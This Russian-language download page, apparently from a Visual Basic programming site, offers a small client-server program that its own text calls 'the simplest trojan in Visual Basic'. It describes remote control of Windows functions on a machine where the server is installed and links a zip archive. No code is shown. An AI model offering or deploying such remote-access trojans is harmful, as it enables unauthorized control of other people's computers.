<!--#include virtual="/ssi/top.html"-->
<div align="center"><center>

<table width="680" cellspacing="0" cellpadding="0">
  <tr>
    <td><hr>
    <b><p>Автор:</b> <a href="http://www.andufo.com">Andres Santos </a></p>
    <p>Эта маленькая программка включает в себя
    клиента и сервера, клиент может контролировать
    некоторые функции Windows на другой машине, если там
    установлен сервер.</p>
    <p>Короче, для тех кто в танке - это простейший
    троян на Visual Basic<br>
    Компилировался на VB 6</p>
    <p><img src="client-server.gif" width="344" height="287"></p>
    <p><a href="client-server.zip"><img src="winzipicon_medium.gif" width="43" height="42"
    border="0"> <b>СКАЧАТЬ </b>(~18Kb)</a><br>
    <br>
    <br>
    <br>
    </td>
  </tr>
</table>
</center></div>
<!--#include virtual="/ssi/bottom.html"-->